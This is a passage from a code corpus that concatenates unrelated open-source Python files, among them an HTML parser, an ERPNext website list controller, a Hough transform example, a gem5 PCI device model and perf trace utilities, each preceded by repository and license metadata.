        elem = match.group(1).lower() # script or style
        if self.cdata_elem is not None:
            if elem != self.cdata_elem:
                self.handle_data(rawdata[i:gtpos])
                return gtpos
        self.handle_endtag(elem.lower())
        self.clear_cdata_mode()
        return gtpos

    # Overridable -- finish processing of start+end tag: <tag.../>
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        self.handle_endtag(tag)

    # Overridable -- handle start tag
    def handle_starttag(self, tag, attrs):
        pass

    # Overridable -- handle end tag
    def handle_endtag(self, tag):
        pass

    # Overridable -- handle character reference
    def handle_charref(self, name):
        pass

    # Overridable -- handle entity reference
    def handle_entityref(self, name):
        pass

    # Overridable -- handle data
    def handle_data(self, data):
        pass

    # Overridable -- handle comment
    def handle_comment(self, data):
        pass

    # Overridable -- handle declaration
    def handle_decl(self, decl):
        pass

    # Overridable -- handle processing instruction
    def handle_pi(self, data):
        pass

    def unknown_decl(self, data):
        if self.strict:
            self.error("unknown declaration: %r" % (data,))

    # Internal -- helper to remove special character quoting
    def unescape(self, s):
        if '&' not in s:
            return s
        def replaceEntities(s):
            s = s.groups()[0]
            try:
                if s[0] == "#":
                    s = s[1:]
                    if s[0] in ['x','X']:
                        c = int(s[1:].rstrip(';'), 16)
                    else:
                        c = int(s.rstrip(';'))
                    return chr(c)
            except ValueError:
                return '&#' + s
            else:
                from html.entities import html5
                if s in html5:
                    return html5[s]
                elif s.endswith(';'):
                    return '&' + s
                for x in range(2, len(s)):
                    if s[:x] in html5:
                        return html5[s[:x]] + s[x:]
                else:
                    return '&' + s
        return re.sub(r"&(#?[xX]?(?:[0-9a-fA-F]+;|\w{1,32};?))",
                      replaceEntities, s, flags=re.ASCII)
| agpl-3.0 |
SCgeeker/OpenSesame | libqtopensesame/widgets/loop_table.py | 2 | 2783 | #-*- coding:utf-8 -*-
"""
This file is part of OpenSesame.
OpenSesame is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenSesame is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenSesame. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = "Sebastiaan Mathot"
__license__ = "GPLv3"
from libqtopensesame.widgets import good_looking_table
from libqtopensesame.misc import _
from PyQt4 import QtCore, QtGui
class loop_table(good_looking_table.good_looking_table):
	"""The looptable extends the QtTableWidget to allow copying and pasting"""
	def __init__(self, loop, rows, columns, parent=None):
		"""
		Constructor

		Arguments:
		loop -- the loop item
		rows -- the nr of rows
		columns -- the nr of columns

		Keyword arguments:
		parent -- parent QWidget (default=None)
		"""
		self.pos = None
		self.loop = loop
		# Re-entrancy guard: while True, apply_changes() is a no-op so that
		# bulk operations (paste/clear) can change many cells and apply the
		# edit exactly once at the end.
		self.lock = False
		icons = {}
		icons["cut"] = self.loop.experiment.icon("cut")
		icons["copy"] = self.loop.experiment.icon("copy")
		icons["paste"] = self.loop.experiment.icon("paste")
		icons["clear"] = self.loop.experiment.icon("clear")
		if not isinstance(rows, int):
			# The cycle count may be defined by a variable, in which case the
			# table cannot know its size; show a hint and fall back to 0 rows.
			self.loop.user_hint_widget.add(
				_(u'Invalid or variably defined number of cycles: %s' % rows))
			self.loop.user_hint_widget.refresh()
			rows = 0
		good_looking_table.good_looking_table.__init__(self,
			rows, columns, icons, parent)
		# Every user edit of a cell is immediately applied to the loop item.
		self.cellChanged.connect(self.apply_changes)
	def paste(self):
		"""Paste data from the clipboard into the table"""
		self.lock = True
		good_looking_table.good_looking_table.paste(self)
		self.lock = False
		self.apply_changes()
	def _clear(self):
		"""Clear the table"""
		self.lock = True
		good_looking_table.good_looking_table._clear(self)
		self.lock = False
		self.apply_changes()
	def apply_changes(self):
		"""
		Apply changes to the table and make sure that the cursor is restored to
		its previous position
		"""
		# Skip while a bulk operation is in progress; it calls apply_changes()
		# itself once it has finished.
		if self.lock:
			return
		self.loop.apply_edit_changes()
	def set_text(self, cycle, col, text):
		"""
		desc:
			Sets text in the loop table in a way that doesn't trigger a
			cellChanged signal.

		arguments:
			cycle:
				desc:	The row.
				type:	int
			col:
				desc:	The column.
				type:	int
			text:
				desc:	The text.
				type:	unicode
		"""
		# Block signals so programmatic updates don't recurse into
		# apply_changes() through the cellChanged connection.
		self.blockSignals(True)
		self.setItem(cycle, col, QtGui.QTableWidgetItem(text))
		self.blockSignals(False)
| gpl-3.0 |
netfirms/erpnext | erpnext/controllers/website_list_for_contact.py | 32 | 2945 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import json
import frappe
from frappe import _
from frappe.utils import flt
from frappe.utils.user import is_website_user
def get_list_context(context=None):
	"""Return the template context shared by all website transaction lists."""
	currency_symbols = dict(frappe.db.sql("""select name, symbol
		from tabCurrency where ifnull(enabled,0)=1"""))
	list_context = {}
	list_context["global_number_format"] = \
		frappe.db.get_default("number_format") or "#,###.##"
	list_context["currency"] = frappe.db.get_default("currency")
	list_context["currency_symbols"] = json.dumps(currency_symbols)
	list_context["row_template"] = "templates/includes/transaction_row.html"
	list_context["get_list"] = get_transaction_list
	return list_context
def get_transaction_list(doctype, txt=None, filters=None, limit_start=0, limit_page_length=20):
	"""Return one page of ``doctype`` records for the website list view.

	Website users only see documents linked to their own customer or
	supplier party; all other users get the normal permitted list.
	"""
	from frappe.templates.pages.list import get_list

	user = frappe.session.user
	if user == "Guest" or not is_website_user():
		# Not a restricted website user: plain permission-checked list.
		return post_process(get_list(doctype, txt, filters, limit_start,
			limit_page_length))

	# Find the party (customer/supplier) records for this contact.
	customers, suppliers = get_customers_suppliers(doctype, user)
	if customers:
		party_filter = (doctype, "customer", "in", customers)
	elif suppliers:
		party_filter = (doctype, "supplier", "in", suppliers)
	else:
		# Website user without any linked party sees nothing.
		return []

	return post_process(get_list(doctype, txt, filters=[party_filter],
		limit_start=limit_start, limit_page_length=limit_page_length,
		ignore_permissions=True))
def post_process(result):
	"""Annotate each row with the billing/delivery progress fields used by
	the transaction row template, then return the rows."""
	for row in result:
		row.status_percent = 0
		display_parts = []

		per_billed = row.get("per_billed")
		if per_billed:
			row.status_percent += flt(per_billed)
			display_parts.append(_("Billed") if per_billed == 100
				else _("{0}% Billed").format(per_billed))

		per_delivered = row.get("per_delivered")
		if per_delivered:
			row.status_percent += flt(per_delivered)
			display_parts.append(_("Delivered") if per_delivered == 100
				else _("{0}% Delivered").format(per_delivered))

		row.status_display = ", ".join(display_parts)
	return result
def get_customers_suppliers(doctype, user):
	"""Return (customers, suppliers) linked to ``user``'s Contact records.

	Each element is a list of party names, or None when ``doctype`` has no
	corresponding link field.
	"""
	meta = frappe.get_meta(doctype)
	contacts = frappe.get_all("Contact", fields=["customer", "supplier", "email_id"],
		filters={"email_id": user})

	customers = None
	if meta.get_field("customer"):
		customers = [contact.customer for contact in contacts if contact.customer]

	suppliers = None
	if meta.get_field("supplier"):
		suppliers = [contact.supplier for contact in contacts if contact.supplier]

	return customers, suppliers
def has_website_permission(doc, ptype, user, verbose=False):
	"""Return whether the website ``user`` may access ``doc``.

	Access is granted when the document belongs to one of the customer or
	supplier parties linked to the user's Contact records.
	"""
	doctype = doc.doctype
	customers, suppliers = get_customers_suppliers(doctype, user)
	if customers:
		return frappe.get_all(doctype, filters=[(doctype, "customer", "in", customers),
			(doctype, "name", "=", doc.name)]) and True or False
	elif suppliers:
		# Bug fix: the link field is "supplier" (as used by
		# get_transaction_list above), not "suppliers" -- the old filter
		# never matched, so suppliers were always denied access.
		return frappe.get_all(doctype, filters=[(doctype, "supplier", "in", suppliers),
			(doctype, "name", "=", doc.name)]) and True or False
	else:
		return False
| agpl-3.0 |
tjsavage/rototutor_djangononrel | django/contrib/localflavor/it/util.py | 436 | 1807 | from django.utils.encoding import smart_str, smart_unicode
def ssn_check_digit(value):
    "Calculate Italian social security number check digit."
    ssn_even_chars = {
        '0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8,
        '9': 9, 'A': 0, 'B': 1, 'C': 2, 'D': 3, 'E': 4, 'F': 5, 'G': 6, 'H': 7,
        'I': 8, 'J': 9, 'K': 10, 'L': 11, 'M': 12, 'N': 13, 'O': 14, 'P': 15,
        'Q': 16, 'R': 17, 'S': 18, 'T': 19, 'U': 20, 'V': 21, 'W': 22, 'X': 23,
        'Y': 24, 'Z': 25
    }
    ssn_odd_chars = {
        '0': 1, '1': 0, '2': 5, '3': 7, '4': 9, '5': 13, '6': 15, '7': 17, '8':
        19, '9': 21, 'A': 1, 'B': 0, 'C': 5, 'D': 7, 'E': 9, 'F': 13, 'G': 15,
        'H': 17, 'I': 19, 'J': 21, 'K': 2, 'L': 4, 'M': 18, 'N': 20, 'O': 11,
        'P': 3, 'Q': 6, 'R': 8, 'S': 12, 'T': 14, 'U': 16, 'V': 10, 'W': 22,
        'X': 25, 'Y': 24, 'Z': 23
    }
    ssn = value.upper()
    total = 0
    for position in range(15):
        # 1st, 3rd, 5th, ... characters (even 0-based index) use the "odd"
        # table; the others use the "even" table.
        table = ssn_odd_chars if position % 2 == 0 else ssn_even_chars
        try:
            total += table[ssn[position]]
        except KeyError:
            msg = "Character '%(char)s' is not allowed." % {'char': ssn[position]}
            raise ValueError(msg)
    # The check digit is the letter 'A'..'Z' indexed by total mod 26.
    return chr(65 + total % 26)
def vat_number_check_digit(vat_number):
    "Calculate Italian VAT number check digit."
    digits = smart_str(vat_number).zfill(10)
    # Digits in even positions (0-based) are summed as-is.
    total = sum(int(digits[i]) for i in range(0, 10, 2))
    # Digits in odd positions are doubled and their digit sum is added
    # (Luhn-style: quotient + remainder of doubled value divided by 10).
    for i in range(1, 11, 2):
        doubled = int(digits[i]) * 2
        total += doubled // 10 + doubled % 10
    return smart_unicode((10 - total % 10) % 10)
| bsd-3-clause |
r"""
=============================
Straight line Hough transform
=============================

The Hough transform in its simplest form is a `method to detect straight lines
<http://en.wikipedia.org/wiki/Hough_transform>`__.

In the following example, we construct an image with a line intersection. We
then use the Hough transform to explore a parameter space for straight lines
that may run through the image.

Algorithm overview
------------------

Usually, lines are parameterised as :math:`y = mx + c`, with a gradient
:math:`m` and y-intercept `c`. However, this would mean that :math:`m` goes to
infinity for vertical lines. Instead, we therefore construct a segment
perpendicular to the line, leading to the origin. The line is represented by
the length of that segment, :math:`r`, and the angle it makes with the x-axis,
:math:`\theta`.

The Hough transform constructs a histogram array representing the parameter
space (i.e., an :math:`M \times N` matrix, for :math:`M` different values of
the radius and :math:`N` different values of :math:`\theta`). For each
parameter combination, :math:`r` and :math:`\theta`, we then find the number of
non-zero pixels in the input image that would fall close to the corresponding
line, and increment the array at position :math:`(r, \theta)` appropriately.

We can think of each non-zero pixel "voting" for potential line candidates. The
local maxima in the resulting histogram indicates the parameters of the most
probably lines. In our example, the maxima occur at 45 and 135 degrees,
corresponding to the normal vector angles of each line.

Another approach is the Progressive Probabilistic Hough Transform [1]_. It is
based on the assumption that using a random subset of voting points give a good
approximation to the actual result, and that lines can be extracted during the
voting process by walking along connected components. This returns the
beginning and end of each line segment, which is useful.

The function `probabilistic_hough` has three parameters: a general threshold
that is applied to the Hough accumulator, a minimum line length and the line
gap that influences line merging. In the example below, we find lines longer
than 10 with a gap less than 3 pixels.

References
----------

.. [1] C. Galamhos, J. Matas and J. Kittler,"Progressive probabilistic
       Hough transform for line detection", in IEEE Computer Society
       Conference on Computer Vision and Pattern Recognition, 1999.

.. [2] Duda, R. O. and P. E. Hart, "Use of the Hough Transformation to
       Detect Lines and Curves in Pictures," Comm. ACM, Vol. 15,
       pp. 11-15 (January, 1972)

"""
from matplotlib import cm
from skimage.transform import (hough_line, hough_line_peaks,
probabilistic_hough_line)
from skimage.feature import canny
from skimage import data
import numpy as np
import matplotlib.pyplot as plt
# Constructing test image.
image = np.zeros((100, 100))
idx = np.arange(25, 75)
image[idx[::-1], idx] = 255  # anti-diagonal line
image[idx, idx] = 255        # main-diagonal line
# Classic straight-line Hough transform.
h, theta, d = hough_line(image)
# Generating figure 1.
fig, (ax0, ax1, ax2) = plt.subplots(1, 3, figsize=(12, 6))
plt.tight_layout()
ax0.imshow(image, cmap=cm.gray)
ax0.set_title('Input image')
ax0.set_axis_off()
# Accumulator on a log scale; `extent` maps histogram bins to
# (angle in degrees, distance in pixels) axes.
ax1.imshow(np.log(1 + h), extent=[np.rad2deg(theta[-1]), np.rad2deg(theta[0]),
           d[-1], d[0]], cmap=cm.gray, aspect=1/1.5)
ax1.set_title('Hough transform')
ax1.set_xlabel('Angles (degrees)')
ax1.set_ylabel('Distance (pixels)')
ax1.axis('image')
ax2.imshow(image, cmap=cm.gray)
row1, col1 = image.shape
# Convert each accumulator peak's (angle, dist) back to two endpoints
# spanning the image width: dist = x*cos(angle) + y*sin(angle).
for _, angle, dist in zip(*hough_line_peaks(h, theta, d)):
    y0 = (dist - 0 * np.cos(angle)) / np.sin(angle)
    y1 = (dist - col1 * np.cos(angle)) / np.sin(angle)
    ax2.plot((0, col1), (y0, y1), '-r')
ax2.axis((0, col1, row1, 0))
ax2.set_title('Detected lines')
ax2.set_axis_off()
# Line finding using the Probabilistic Hough Transform.
image = data.camera()
edges = canny(image, 2, 1, 25)
lines = probabilistic_hough_line(edges, threshold=10, line_length=5,
                                 line_gap=3)
# Generating figure 2.
fig, (ax0, ax1, ax2) = plt.subplots(1, 3, figsize=(16, 6), sharex=True,
                                    sharey=True)
plt.tight_layout()
ax0.imshow(image, cmap=cm.gray)
ax0.set_title('Input image')
ax0.set_axis_off()
ax0.set_adjustable('box-forced')
ax1.imshow(edges, cmap=cm.gray)
ax1.set_title('Canny edges')
ax1.set_axis_off()
ax1.set_adjustable('box-forced')
ax2.imshow(edges * 0)
# Each probabilistic line is an endpoint pair ((x0, y0), (x1, y1)).
for line in lines:
    p0, p1 = line
    ax2.plot((p0[0], p1[0]), (p0[1], p1[1]))
row2, col2 = image.shape
ax2.axis((0, col2, row2, 0))
ax2.set_title('Probabilistic Hough')
ax2.set_axis_off()
ax2.set_adjustable('box-forced')
plt.show()
| bsd-3-clause |
moazzemi/HAMEX | cpu/gem5/src/dev/pci/PciDevice.py | 23 | 7947 | # Copyright (c) 2013 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2005-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Nathan Binkert
from m5.SimObject import SimObject
from m5.params import *
from m5.proxy import *
from Device import DmaDevice
from PciHost import PciHost
class PciDevice(DmaDevice):
    """Abstract base class for PCI devices.

    Declares the registers of the standard (type 0) PCI configuration
    space header plus the optional capability structures used by PCIe
    devices (PMCAP, MSICAP, MSIXCAP, PXCAP).  Concrete device models
    subclass this and override the IDs, BARs and capability registers
    they implement.
    """
    type = 'PciDevice'
    cxx_class = 'PciDevice'
    cxx_header = "dev/pci/device.hh"
    # Abstract: only concrete subclasses may be instantiated.
    abstract = True

    # Geographic location of the device: host bridge, bus number and
    # device/function numbers on that bus.
    host = Param.PciHost(Parent.any, "PCI host")
    pci_bus = Param.Int("PCI bus")
    pci_dev = Param.Int("PCI device number")
    pci_func = Param.Int("PCI function code")

    # Simulated latencies for programmed IO and config-space accesses.
    pio_latency = Param.Latency('30ns', "Programmed IO latency")
    config_latency = Param.Latency('20ns', "Config read or write latency")

    # Standard PCI configuration space header registers.
    VendorID = Param.UInt16("Vendor ID")
    DeviceID = Param.UInt16("Device ID")
    Command = Param.UInt16(0, "Command")
    Status = Param.UInt16(0, "Status")
    Revision = Param.UInt8(0, "Device")
    ProgIF = Param.UInt8(0, "Programming Interface")
    SubClassCode = Param.UInt8(0, "Sub-Class Code")
    ClassCode = Param.UInt8(0, "Class Code")
    CacheLineSize = Param.UInt8(0, "System Cacheline Size")
    LatencyTimer = Param.UInt8(0, "PCI Latency Timer")
    HeaderType = Param.UInt8(0, "PCI Header Type")
    BIST = Param.UInt8(0, "Built In Self Test")

    # Base address registers and the sizes of the regions they decode.
    BAR0 = Param.UInt32(0x00, "Base Address Register 0")
    BAR1 = Param.UInt32(0x00, "Base Address Register 1")
    BAR2 = Param.UInt32(0x00, "Base Address Register 2")
    BAR3 = Param.UInt32(0x00, "Base Address Register 3")
    BAR4 = Param.UInt32(0x00, "Base Address Register 4")
    BAR5 = Param.UInt32(0x00, "Base Address Register 5")
    BAR0Size = Param.MemorySize32('0B', "Base Address Register 0 Size")
    BAR1Size = Param.MemorySize32('0B', "Base Address Register 1 Size")
    BAR2Size = Param.MemorySize32('0B', "Base Address Register 2 Size")
    BAR3Size = Param.MemorySize32('0B', "Base Address Register 3 Size")
    BAR4Size = Param.MemorySize32('0B', "Base Address Register 4 Size")
    BAR5Size = Param.MemorySize32('0B', "Base Address Register 5 Size")

    # BARs that are hardwired to fixed legacy IO addresses instead of
    # being programmed through configuration space.
    BAR0LegacyIO = Param.Bool(False, "Whether BAR0 is hardwired legacy IO")
    BAR1LegacyIO = Param.Bool(False, "Whether BAR1 is hardwired legacy IO")
    BAR2LegacyIO = Param.Bool(False, "Whether BAR2 is hardwired legacy IO")
    BAR3LegacyIO = Param.Bool(False, "Whether BAR3 is hardwired legacy IO")
    BAR4LegacyIO = Param.Bool(False, "Whether BAR4 is hardwired legacy IO")
    BAR5LegacyIO = Param.Bool(False, "Whether BAR5 is hardwired legacy IO")
    LegacyIOBase = Param.Addr(0x0, "Base Address for Legacy IO")

    # Remaining type 0 header registers.
    CardbusCIS = Param.UInt32(0x00, "Cardbus Card Information Structure")
    SubsystemID = Param.UInt16(0x00, "Subsystem ID")
    SubsystemVendorID = Param.UInt16(0x00, "Subsystem Vendor ID")
    ExpansionROM = Param.UInt32(0x00, "Expansion ROM Base Address")
    CapabilityPtr = Param.UInt8(0x00, "Capability List Pointer offset")
    InterruptLine = Param.UInt8(0x00, "Interrupt Line")
    InterruptPin = Param.UInt8(0x00, "Interrupt Pin")
    MaximumLatency = Param.UInt8(0x00, "Maximum Latency")
    MinimumGrant = Param.UInt8(0x00, "Minimum Grant")

    # Capabilities List structures for PCIe devices
    # PMCAP - PCI Power Management Capability
    PMCAPBaseOffset = \
        Param.UInt8(0x00, "Base offset of PMCAP in PCI Config space")
    PMCAPNextCapability = \
        Param.UInt8(0x00, "Pointer to next capability block")
    PMCAPCapId = \
        Param.UInt8(0x00, "Specifies this is the Power Management capability")
    PMCAPCapabilities = \
        Param.UInt16(0x0000, "PCI Power Management Capabilities Register")
    PMCAPCtrlStatus = \
        Param.UInt16(0x0000, "PCI Power Management Control and Status")

    # MSICAP - Message Signaled Interrupt Capability
    MSICAPBaseOffset = \
        Param.UInt8(0x00, "Base offset of MSICAP in PCI Config space")
    MSICAPNextCapability = \
        Param.UInt8(0x00, "Pointer to next capability block")
    MSICAPCapId = Param.UInt8(0x00, "Specifies this is the MSI Capability")
    MSICAPMsgCtrl = Param.UInt16(0x0000, "MSI Message Control")
    MSICAPMsgAddr = Param.UInt32(0x00000000, "MSI Message Address")
    MSICAPMsgUpperAddr = Param.UInt32(0x00000000, "MSI Message Upper Address")
    MSICAPMsgData = Param.UInt16(0x0000, "MSI Message Data")
    MSICAPMaskBits = Param.UInt32(0x00000000, "MSI Interrupt Mask Bits")
    MSICAPPendingBits = Param.UInt32(0x00000000, "MSI Pending Bits")

    # MSIXCAP - MSI-X Capability
    MSIXCAPBaseOffset = \
        Param.UInt8(0x00, "Base offset of MSIXCAP in PCI Config space")
    MSIXCAPNextCapability = \
        Param.UInt8(0x00, "Pointer to next capability block")
    MSIXCAPCapId = Param.UInt8(0x00, "Specifies this is the MSI-X Capability")
    MSIXMsgCtrl = Param.UInt16(0x0000, "MSI-X Message Control")
    MSIXTableOffset = \
        Param.UInt32(0x00000000, "MSI-X Table Offset and Table BIR")
    MSIXPbaOffset = Param.UInt32(0x00000000, "MSI-X PBA Offset and PBA BIR")

    # PXCAP - PCI Express Capability
    PXCAPBaseOffset = \
        Param.UInt8(0x00, "Base offset of PXCAP in PCI Config space")
    PXCAPNextCapability = Param.UInt8(0x00, "Pointer to next capability block")
    PXCAPCapId = Param.UInt8(0x00, "Specifies this is the PCIe Capability")
    PXCAPCapabilities = Param.UInt16(0x0000, "PCIe Capabilities")
    PXCAPDevCapabilities = Param.UInt32(0x00000000, "PCIe Device Capabilities")
    PXCAPDevCtrl = Param.UInt16(0x0000, "PCIe Device Control")
    PXCAPDevStatus = Param.UInt16(0x0000, "PCIe Device Status")
    PXCAPLinkCap = Param.UInt32(0x00000000, "PCIe Link Capabilities")
    PXCAPLinkCtrl = Param.UInt16(0x0000, "PCIe Link Control")
    PXCAPLinkStatus = Param.UInt16(0x0000, "PCIe Link Status")
    PXCAPDevCap2 = Param.UInt32(0x00000000, "PCIe Device Capabilities 2")
    PXCAPDevCtrl2 = Param.UInt32(0x00000000, "PCIe Device Control 2")
| mit |
elysium001/zamboni | mkt/games/filters.py | 8 | 1779 | import datetime
import elasticsearch_dsl.filter as es_filter
from elasticsearch_dsl import aggs, query, SF
from rest_framework.filters import BaseFilterBackend
from mkt.games.constants import GAME_CATEGORIES
class DailyGamesFilter(BaseFilterBackend):
    """
    Randomly chooses 4 games, one from each featured game category, based off
    of the current date such that the games are shuffled daily.
    The query:
    - Selects only games that match the featured game category tags.
    - Scores randomly using random_score using date as seed.
    - Buckets by tag, using Top Hits with size=1 to select only one game
      from each category.
    - elastic.co/guide/en/elasticsearch/guide/current/top-hits.html
    """
    def filter_queryset(self, request, queryset, view):
        """Attach the daily-random query and per-tag aggregation to queryset.

        Returns the modified Elasticsearch queryset; note the comment below —
        results must be read from S.execute().aggregations, not from the hits.
        """
        # Same integer for every request on a given day (e.g. 20240131), so
        # the "random" scoring only reshuffles at midnight (server-local time).
        daily_seed = int(datetime.datetime.now().strftime('%Y%m%d'))
        # Map over the game categories to create a function score query for one
        # and dump it into a Bool should.
        game_query = query.Q(
            'function_score',
            filter=es_filter.Bool(should=[es_filter.Term(tags=cat)
                                          for cat in GAME_CATEGORIES]),
            # Consistently random based on the day.
            functions=[SF('random_score', seed=daily_seed)],
        )
        # Buckets by tag. Run a size=1 TopHits aggregation to only select one
        # game from each tag. Results will have to be pulled out of
        # S.execute().aggregations rather than S.execute().hits.
        top_hits = aggs.TopHits(size=1)
        a = aggs.A('terms', field='tags', aggs={'first_game': top_hits})
        queryset = queryset.query(game_query)[0:4]
        queryset.aggs.bucket('top_hits', a)  # Not chainable.
        return queryset
| bsd-3-clause |
bluewish/tiny4412-linux-3.5 | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py | 12527 | 1935 | # Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
# Futex operation codes and flags (see futex(2)).
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
# Mask that strips the option flags from a futex op, leaving the command.
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)

NSECS_PER_SEC = 1000000000

def avg(total, n):
    """Return the mean of a running total over n samples."""
    return total / n

def nsecs(secs, nsecs):
    """Combine a (secs, nsecs) pair into a single nanosecond count."""
    return secs * NSECS_PER_SEC + nsecs

def nsecs_secs(nsecs):
    """Return the whole-second part of a nanosecond count.

    Floor division keeps the result an integer on both Python 2 and
    Python 3 (plain '/' would produce a float on Python 3).
    """
    return nsecs // NSECS_PER_SEC

def nsecs_nsecs(nsecs):
    """Return the sub-second remainder of a nanosecond count."""
    return nsecs % NSECS_PER_SEC

def nsecs_str(nsecs):
    """Format a nanosecond count as a 'seconds.nanoseconds' string.

    (A stray trailing comma previously made this return a 1-tuple
    instead of the intended string.)
    """
    return "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs))
def add_stats(dict, key, value):
    """Fold value into dict[key], maintaining a (min, max, avg, count) tuple.

    Note: 'avg' is a running pairwise average, not a true arithmetic mean;
    this preserves the original behaviour.  dict.has_key() was replaced by
    the 'in' operator, which works on both Python 2 and Python 3.
    """
    if key not in dict:
        dict[key] = (value, value, value, 1)
    else:
        lo, hi, mean, count = dict[key]
        if value < lo:
            lo = value
        if value > hi:
            hi = value
        mean = (mean + value) / 2
        dict[key] = (lo, hi, mean, count + 1)
def clear_term():
    """Clear the terminal by emitting the ANSI cursor-home and
    erase-screen escape sequences."""
    ansi_home_and_clear = "\x1b[H\x1b[2J"
    print(ansi_home_and_clear)
audit_package_warned = False
try:
    import audit
    # Map os.uname() machine names onto audit's machine-type constants so
    # syscall numbers can be translated for the host architecture.
    machine_to_id = {
        'x86_64': audit.MACH_86_64,
        'alpha' : audit.MACH_ALPHA,
        'ia64'  : audit.MACH_IA64,
        'ppc'   : audit.MACH_PPC,
        'ppc64' : audit.MACH_PPC64,
        's390'  : audit.MACH_S390,
        's390x' : audit.MACH_S390X,
        'i386'  : audit.MACH_X86,
        'i586'  : audit.MACH_X86,
        'i686'  : audit.MACH_X86,
    }
    try:
        # MACH_ARMEB only exists in newer audit-libs-python releases.
        machine_to_id['armeb'] = audit.MACH_ARMEB
    except AttributeError:
        pass
    machine_id = machine_to_id[os.uname()[4]]
except Exception:
    # The audit bindings are optional (or this machine may be unknown to
    # them); syscall_name() falls back to numeric ids in that case.
    # print() as a function keeps the module importable on Python 3.
    if not audit_package_warned:
        audit_package_warned = True
        print("Install the audit-libs-python package to get syscall names")
def syscall_name(id):
    """Return the symbolic name for syscall number id.

    Falls back to the number as a string when the audit bindings are not
    installed (audit/machine_id undefined -> NameError) or the lookup fails.
    """
    try:
        return audit.audit_syscall_to_name(id, machine_id)
    except Exception:
        return str(id)
def strerror(nr):
    """Return the errno symbol (e.g. 'ENOENT') for nr, ignoring sign.

    Unknown numbers yield "Unknown <nr> errno".  The original bare
    'except' was narrowed to KeyError, the only failure the lookup in
    errno.errorcode is expected to raise.
    """
    try:
        return errno.errorcode[abs(nr)]
    except KeyError:
        return "Unknown %d errno" % nr
| gpl-2.0 |
Gitlab11/odoo | addons/lunch/wizard/lunch_order.py | 440 | 1299 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2012 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class lunch_order_order(osv.TransientModel):
    """Transient wizard model used to confirm (order) selected lunch meals."""
    _name = 'lunch.order.order'
    _description = 'Wizard to order a meal'

    def order(self, cr, uid, ids, context=None):
        """Delegate the actual ordering to the lunch.order.line model."""
        order_line_model = self.pool.get('lunch.order.line')
        return order_line_model.order(cr, uid, ids, context=context)
| agpl-3.0 |
vnsofthe/odoo-dev | addons/account/res_currency.py | 340 | 2267 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010 OpenERP s.a. (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
